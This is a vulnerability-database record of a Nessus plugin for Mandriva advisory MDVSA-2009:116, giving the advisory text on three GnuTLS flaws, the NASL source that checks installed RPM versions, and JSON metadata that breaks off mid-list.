Mandriva Linux Security Advisory : gnutls (MDVSA-2009:116)
2009-05-19T00:00:00
ID MANDRIVA_MDVSA-2009-116.NASL Type nessus Reporter This script is Copyright (C) 2009-2021 Tenable Network Security, Inc. Modified 2009-05-19T00:00:00
Description
Multiple vulnerabilities has been found and corrected in gnutls :
lib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not
properly handle invalid DSA signatures, which allows remote attackers
to cause a denial of service (application crash) and possibly have
unspecified other impact via a malformed DSA key that triggers a (1)
free of an uninitialized pointer or (2) double free (CVE-2009-1415).
lib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates
RSA keys stored in DSA structures, instead of the intended DSA keys,
which might allow remote attackers to spoof signatures on certificates
or have unspecified other impact by leveraging an invalid DSA key
(CVE-2009-1416).
gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and
expiration times of X.509 certificates, which allows remote attackers
to successfully present a certificate that is (1) not yet valid or (2)
no longer valid, related to lack of time checks in the
_gnutls_x509_verify_certificate function in lib/x509/verify.c in
libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup
(CVE-2009-1417).
The updated packages have been patched to prevent this.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Mandriva Linux Security Advisory MDVSA-2009:116.
# The text itself is copyright (C) Mandriva S.A.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(38815);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
script_cve_id("CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417");
script_xref(name:"MDVSA", value:"2009:116");
script_name(english:"Mandriva Linux Security Advisory : gnutls (MDVSA-2009:116)");
script_summary(english:"Checks rpm output for the updated packages");
script_set_attribute(
attribute:"synopsis",
value:
"The remote Mandriva Linux host is missing one or more security
updates."
);
script_set_attribute(
attribute:"description",
value:
"Multiple vulnerabilities has been found and corrected in gnutls :
lib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not
properly handle invalid DSA signatures, which allows remote attackers
to cause a denial of service (application crash) and possibly have
unspecified other impact via a malformed DSA key that triggers a (1)
free of an uninitialized pointer or (2) double free (CVE-2009-1415).
lib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates
RSA keys stored in DSA structures, instead of the intended DSA keys,
which might allow remote attackers to spoof signatures on certificates
or have unspecified other impact by leveraging an invalid DSA key
(CVE-2009-1416).
gnutls-cli in GnuTLS before 2.6.6 does not verify the activation and
expiration times of X.509 certificates, which allows remote attackers
to successfully present a certificate that is (1) not yet valid or (2)
no longer valid, related to lack of time checks in the
_gnutls_x509_verify_certificate function in lib/x509/verify.c in
libgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup
(CVE-2009-1417).
The updated packages have been patched to prevent this."
);
script_set_attribute(attribute:"solution", value:"Update the affected packages.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cwe_id(255, 310);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:gnutls");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64gnutls-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:lib64gnutls26");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libgnutls-devel");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:libgnutls26");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2008.1");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2009.1");
script_set_attribute(attribute:"patch_publication_date", value:"2009/05/18");
script_set_attribute(attribute:"plugin_publication_date", value:"2009/05/19");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.");
script_family(english:"Mandriva Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux");
if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu);
flag = 0;
if (rpm_check(release:"MDK2008.1", reference:"gnutls-2.3.0-2.5mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.1", cpu:"x86_64", reference:"lib64gnutls-devel-2.3.0-2.5mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.1", cpu:"x86_64", reference:"lib64gnutls26-2.3.0-2.5mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.1", cpu:"i386", reference:"libgnutls-devel-2.3.0-2.5mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2008.1", cpu:"i386", reference:"libgnutls26-2.3.0-2.5mdv2008.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", reference:"gnutls-2.4.1-2.4mdv2009.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", cpu:"x86_64", reference:"lib64gnutls-devel-2.4.1-2.4mdv2009.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", cpu:"x86_64", reference:"lib64gnutls26-2.4.1-2.4mdv2009.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", cpu:"i386", reference:"libgnutls-devel-2.4.1-2.4mdv2009.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.0", cpu:"i386", reference:"libgnutls26-2.4.1-2.4mdv2009.0", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.1", reference:"gnutls-2.6.4-1.2mdv2009.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.1", cpu:"x86_64", reference:"lib64gnutls-devel-2.6.4-1.2mdv2009.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.1", cpu:"x86_64", reference:"lib64gnutls26-2.6.4-1.2mdv2009.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.1", cpu:"i386", reference:"libgnutls-devel-2.6.4-1.2mdv2009.1", yank:"mdv")) flag++;
if (rpm_check(release:"MDK2009.1", cpu:"i386", reference:"libgnutls26-2.6.4-1.2mdv2009.1", yank:"mdv")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "MANDRIVA_MDVSA-2009-116.NASL", "bulletinFamily": "scanner", "title": "Mandriva Linux Security Advisory : gnutls (MDVSA-2009:116)", "description": "Multiple vulnerabilities has been found and corrected in gnutls :\n\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free (CVE-2009-1415).\n\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key\n(CVE-2009-1416).\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nThe updated packages have been patched to prevent this.", "published": "2009-05-19T00:00:00", "modified": "2009-05-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/38815", "reporter": "This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"], "type": "nessus", "lastseen": "2021-01-07T11:52:07", "edition": 25, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-1415", "CVE-2009-1416", "CVE-2009-1417"]}, {"type": "openvas", "idList": ["OPENVAS:64129", "OPENVAS:136141256231066371", "OPENVAS:64785", "OPENVAS:136141256231064129", "OPENVAS:64043", "OPENVAS:63965", "OPENVAS:136141256231064785", "OPENVAS:66371", "OPENVAS:136141256231064043", "OPENVAS:136141256231063965"]}, {"type": "gentoo", "idList": ["GLSA-200905-04"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:21839", "SECURITYVULNS:VULN:9913"]}, {"type": "seebug", "idList": ["SSV:11185", "SSV:86225", "SSV:86226"]}, {"type": "freebsd", "idList": ["B31A1088-460F-11DE-A11A-0022156E8794"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2009-308.NASL", "FREEBSD_PKG_B31A1088460F11DEA11A0022156E8794.NASL", "SLACKWARE_SSA_2009-128-01.NASL", "GENTOO_GLSA-200905-04.NASL"]}, {"type": "slackware", "idList": ["SSA-2009-128-01"]}, {"type": "exploitdb", "idList": ["EDB-ID:32965", "EDB-ID:32964"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:F44C5C7EC320E10F866BF043291D8D2C", "EXPLOITPACK:72F8544C2F7BFB496FA55A540F3A8CB9"]}], "modified": "2021-01-07T11:52:07", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2021-01-07T11:52:07", "rev": 2}, "vulnersScore": 6.4}, "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:116. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(38815);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1415\", \"CVE-2009-1416\", \"CVE-2009-1417\");\n script_xref(name:\"MDVSA\", value:\"2009:116\");\n\n script_name(english:\"Mandriva Linux Security Advisory : gnutls (MDVSA-2009:116)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been found and corrected in gnutls :\n\nlib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not\nproperly handle invalid DSA signatures, which allows remote attackers\nto cause a denial of service (application crash) and possibly have\nunspecified other impact via a malformed DSA key that triggers a (1)\nfree of an uninitialized pointer or (2) double free (CVE-2009-1415).\n\nlib/gnutls_pk.c in libgnutls in GnuTLS 2.5.0 through 2.6.5 generates\nRSA keys stored in DSA structures, instead of the intended DSA keys,\nwhich might allow remote attackers to spoof signatures on certificates\nor have unspecified other impact by leveraging an invalid DSA key\n(CVE-2009-1416).\n\ngnutls-cli in GnuTLS before 2.6.6 does not verify the activation and\nexpiration times of X.509 certificates, which allows remote attackers\nto successfully present a certificate that is (1) not yet valid or (2)\nno longer valid, related to lack of time checks in the\n_gnutls_x509_verify_certificate function in lib/x509/verify.c in\nlibgnutls_x509, as used by (a) Exim, (b) OpenLDAP, and (c) libsoup\n(CVE-2009-1417).\n\nThe updated packages have been patched to prevent this.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(255, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64gnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.1\", reference:\"gnutls-2.3.0-2.5mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64gnutls-devel-2.3.0-2.5mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"x86_64\", reference:\"lib64gnutls26-2.3.0-2.5mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libgnutls-devel-2.3.0-2.5mdv2008.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.1\", cpu:\"i386\", reference:\"libgnutls26-2.3.0-2.5mdv2008.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", reference:\"gnutls-2.4.1-2.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64gnutls-devel-2.4.1-2.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64gnutls26-2.4.1-2.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libgnutls-devel-2.4.1-2.4mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libgnutls26-2.4.1-2.4mdv2009.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.1\", reference:\"gnutls-2.6.4-1.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64gnutls-devel-2.6.4-1.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64gnutls26-2.6.4-1.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libgnutls-devel-2.6.4-1.2mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libgnutls26-2.6.4-1.2mdv2009.1\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Mandriva Local Security Checks", "pluginID": "38815", "cpe": ["cpe:/o:mandriva:linux:2009.0", "cpe:/o:mandriva:linux:2008.1", "cpe:/o:mandriva:linux:2009.1", "p-cpe:/a:mandriva:linux:libgnutls26", "p-cpe:/a:mandriva:linux:gnutls", "p-cpe:/a:mandriva:linux:lib64gnutls26", "p-cpe:/a:mandriva:linux:lib64gnutls-devel", "p-cpe:/a:mandriva:linux:libgnutls-devel"], "scheme": null}
{"cve": [{"lastseen": "2020-12-09T19:31:18", "description": "lib/pk-libgcrypt.c in libgnutls in GnuTLS before 2.6.6 does not properly handle invalid DSA signatures, which allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via a malformed DSA key that triggers a (1) free of an uninitialized pointer or (2) double free.", "edition": 5, "cvss3": {}, "published": "2009-04-30T20:30:00", "title": "CVE-2009-1415", "type": "cve", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1415"], "modified": "2017-08-17T01:30:00", "cpe": ["cpe:/a:gnu:gnutls:1.2.11", "cpe:/a:gnu:gnutls:1.0.16", "cpe:/a:gnu:gnutls:2.1.3", "cpe:/a:gnu:gnutls:1.7.19", "cpe:/a:gnu:gnutls:1.5.5", "cpe:/a:gnu:gnutls:1.0.25", "cpe:/a:gnu:gnutls:1.2.4", "cpe:/a:gnu:gnutls:1.7.10", "cpe:/a:gnu:gnutls:1.6.3", "cpe:/a:gnu:gnutls:1.6.0", "cpe:/a:gnu:gnutls:2.2.0", "cpe:/a:gnu:gnutls:1.1.23", "cpe:/a:gnu:gnutls:1.7.6", "cpe:/a:gnu:gnutls:1.7.0", "cpe:/a:gnu:gnutls:2.1.7", "cpe:/a:gnu:gnutls:1.0.17", "cpe:/a:gnu:gnutls:2.4.0", "cpe:/a:gnu:gnutls:2.1.5", "cpe:/a:gnu:gnutls:2.1.2", "cpe:/a:gnu:gnutls:2.3.9", "cpe:/a:gnu:gnutls:2.4.1", "cpe:/a:gnu:gnutls:1.3.0", "cpe:/a:gnu:gnutls:1.0.24", "cpe:/a:gnu:gnutls:1.7.15", "cpe:/a:gnu:gnutls:1.1.15", "cpe:/a:gnu:gnutls:1.1.13", "cpe:/a:gnu:gnutls:1.6.2", "cpe:/a:gnu:gnutls:1.5.1", "cpe:/a:gnu:gnutls:1.0.20", "cpe:/a:gnu:gnutls:1.3.3", "cpe:/a:gnu:gnutls:1.7.13", "cpe:/a:gnu:gnutls:2.2.4", "cpe:/a:gnu:gnutls:1.7.7", "cpe:/a:gnu:gnutls:1.2.8.1a1", "cpe:/a:gnu:gnutls:1.4.2", "cpe:/a:gnu:gnutls:2.3.5", "cpe:/a:gnu:gnutls:2.1.4", "cpe:/a:gnu:gnutls:2.0.0", "cpe:/a:gnu:gnutls:2.3.7", "cpe:/a:gnu:gnutls:2.6.1", "cpe:/a:gnu:gnutls:2.0.3", "cpe:/a:gnu:gnutls:1.4.0", "cpe:/a:gnu:gnutls:1.4.3", "cpe:/a:gnu:gnutls:1.2.7", "cpe:/a:gnu:gnutls:1.1.20", "cpe:/a:gnu:gnutls:1.2.2", "cpe:/a:gnu:gnutls:1.3.5", "cpe:/a:gnu:gnutls:1.7.5", "cpe:/a:gnu:gnutls:2.2.3", "cpe:/a:gnu:gnutls:1.7.12", "cpe:/a:gnu:gnutls:1.0.23", "cpe:/a:gnu:gnutls:2.3.1", "cpe:/a:gnu:gnutls:1.7.18", "cpe:/a:gnu:gnutls:1.1.17", "cpe:/a:gnu:gnutls:1.7.2", "cpe:/a:gnu:gnutls:1.5.3", "cpe:/a:gnu:gnutls:1.4.4", "cpe:/a:gnu:gnutls:2.3.0", "cpe:/a:gnu:gnutls:1.2.0", "cpe:/a:gnu:gnutls:2.3.3", "cpe:/a:gnu:gnutls:2.4.2", "cpe:/a:gnu:gnutls:1.6.1", "cpe:/a:gnu:gnutls:1.7.17", "cpe:/a:gnu:gnutls:1.7.16", "cpe:/a:gnu:gnutls:1.1.22", "cpe:/a:gnu:gnutls:2.3.10", "cpe:/a:gnu:gnutls:1.7.8", "cpe:/a:gnu:gnutls:1.2.6", "cpe:/a:gnu:gnutls:1.1.19", "cpe:/a:gnu:gnutls:2.1.8", "cpe:/a:gnu:gnutls:1.7.14", "cpe:/a:gnu:gnutls:1.5.0", "cpe:/a:gnu:gnutls:1.5.4", "cpe:/a:gnu:gnutls:1.4.5", "cpe:/a:gnu:gnutls:2.6.2", "cpe:/a:gnu:gnutls:1.7.11", "cpe:/a:gnu:gnutls:2.0.1", "cpe:/a:gnu:gnutls:1.0.18", "cpe:/a:gnu:gnutls:2.6.4", "cpe:/a:gnu:gnutls:1.1.14", "cpe:/a:gnu:gnutls:2.3.6", "cpe:/a:gnu:gnutls:1.2.8", "cpe:/a:gnu:gnutls:1.1.18", "cpe:/a:gnu:gnutls:2.3.11", "cpe:/a:gnu:gnutls:1.2.10", "cpe:/a:gnu:gnutls:1.3.1", "cpe:/a:gnu:gnutls:2.2.5", "cpe:/a:gnu:gnutls:2.3.4", "cpe:/a:gnu:gnutls:1.4.1", "cpe:/a:gnu:gnutls:2.6.0", "cpe:/a:gnu:gnutls:1.3.2", "cpe:/a:gnu:gnutls:2.0.4", "cpe:/a:gnu:gnutls:2.1.6", "cpe:/a:gnu:gnutls:2.2.2", "cpe:/a:gnu:gnutls:1.5.2", "cpe:/a:gnu:gnutls:1.7.9", "cpe:/a:gnu:gnutls:2.6.3", "cpe:/a:gnu:gnutls:2.0.2", "cpe:/a:gnu:gnutls:1.2.1", "cpe:/a:gnu:gnutls:1.7.4", "cpe:/a:gnu:gnutls:2.6.5", "cpe:/a:gnu:gnutls:2.1.0", "cpe:/a:gnu:gnutls:1.0.22", "cpe:/a:gnu:gnutls:2.1.1", "cpe:/a:gnu:gnutls:2.3.8", "cpe:/a:gnu:gnutls:2.2.1", "cpe:/a:gnu:gnutls:1.1.21", "cpe:/a:gnu:gnutls:1.2.3", "cpe:/a:gnu:gnutls:1.1.16", "cpe:/a:gnu:gnutls:1.2.9", "cpe:/a:gnu:gnutls:1.0.19", "cpe:/a:gnu:gnutls:2.3.2", "cpe:/a:gnu:gnutls:1.7.1", "cpe:/a:gnu:gnutls:1.3.4", "cpe:/a:gnu:gnutls:1.0.21", "cpe:/a:gnu:gnutls:1.2.5", "cpe:/a:gnu:gnutls:1.7.3"], "id": "CVE-2009-1415", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1415", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:gnu:gnutls:1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.15:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.23:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.8.1a1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.12:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.7.13:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:gnu:gnutls:1.2.10:*:*:*:*:*:*:*", 